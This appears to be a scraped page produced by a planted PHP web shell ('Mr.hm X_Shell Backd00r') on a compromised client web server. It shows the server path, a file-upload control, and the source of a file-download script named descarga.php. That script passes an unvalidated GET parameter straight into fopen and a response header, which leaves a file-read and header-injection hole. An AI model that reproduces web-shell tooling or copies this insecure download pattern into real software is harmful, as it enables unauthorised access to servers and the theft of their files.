[#] hm X_Shell Backd00r [#]

Current Path : /var/www/clients/client35/web46/web/QR/
Upload File :
Current File : /var/www/clients/client35/web46/web/QR/descarga.php

<?php
    
    $f = $_GET["f"];
    if(strpos($f,"/")!==false){
        die("No puedes navegar por otros directorios");
    }   

    header("Content-type: application/octet-stream");
    header("Content-Disposition: attachment; filename=\"$f\"\n");
    $fp=fopen("$f", "r");
    fpassthru($fp);
?> 

Mr.hm X_Shell Backd00r 1.0, Coded By Mr.hm X_Shell Backd00r